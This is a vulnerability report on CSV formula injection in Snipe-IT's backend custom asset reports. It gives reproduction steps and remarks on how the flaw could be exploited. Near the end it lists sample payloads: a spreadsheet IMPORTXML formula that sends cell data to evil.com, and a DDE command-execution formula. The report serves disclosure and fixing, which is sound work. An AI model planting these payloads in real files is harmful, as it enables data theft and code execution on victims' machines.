CSV Injection in CSV files generated by the backend in snipe/snipe-it
Sep 27th 2022
Formula Elements are not sanitized before adding to CSV reports. This leads to CSV formula injection.
Proof of Concept
Steps to reproduce:
1. Log in to Snipe-IT & create a new Asset with arbitrary values. For the Asset Tag enter =1+1 (Screenshot 1) 2. Got to Reports -> Custom Asset Report. Click on Generate and save the CSV report 3. Observe that the formula entered into the Asset Tag field is not sanitized in the CSV report (Screenshot 2) 4. To prove the CSV injection, open the CSV file in a program like Excel or LibreOffice and observe that the content is interpreted as a formula. Remark: whether this is actually interpreted as a formula depends on the program and platform settings. Google Sheets with default settings was used for this PoC (Screenshot 3)
Note: Formulas in CSV files generated by the frontend are properly sanitized. For instance
Assets -> List All -> Export -> CSV (Screenshot 4)
Remarks on Exploitation
The exploitation of CSV injection is platform and program dependent. CSV files are typically viewed with programs like Microsoft Excel, LibreOffice or Google Sheets. Each of these programs might interpret formulas differently or implement mitigations against CSV injection. This is outside of the scope of Snipe-IT though. Snipe-IT should implement proper formula sanitization to ensure that endusers are protected from CSV injection regardless of the program used to open CSV files. Here are some potential payloads to exploit CSV injection (not tested as this is considered out of scope):
=IMPORTXML(CONCAT("http://evil.com/?v=", CONCATENATE(A2:E2)), "//a/a10")
Local File Exfiltration:
Remote Code Execution
=cmd|' /C calc'!A0
The impact of CSV injection can be data exfiltration, local file inclusion, and even remote code execution. The concrete impact depends on the program used by the victim to open the CSV file, as some programs might implement mitigations against CSV injection.